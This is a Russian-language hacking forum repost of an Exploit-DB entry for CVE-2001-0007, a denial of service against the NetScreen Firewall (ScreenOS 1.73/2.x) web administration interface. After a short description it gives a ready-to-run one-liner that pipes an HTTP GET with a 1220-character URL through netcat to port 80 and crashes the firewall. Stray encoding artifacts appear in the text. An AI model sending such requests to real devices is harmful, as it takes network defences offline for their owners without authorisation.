Exploit ScreenOS 1.73/2.x - Firewall Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20532
Проверка EDB
  1. Пройдено
Автор
NSFOCUS
Тип уязвимости
DOS
Платформа
SCO
CVE
cve-2001-0007
Дата публикации
2001-01-08
Код:
source: https://www.securityfocus.com/bid/2176/info

NetScreen Firewall is a network appliance used to secure against intruders and various types of attacks to a network. NetScreen has a Web administrative Interface (WebUI) used to configure and set the firewall settings.

It is possible to cause a denial of service in NetScreen Firewall. Requesting an unusually long URL to WebUI listening on default port 80, will cause the firewall to crash. A restart of the service is required in order to gain normal functionality. 

Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall= will crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80
 
Источник
www.exploit-db.com

Похожие темы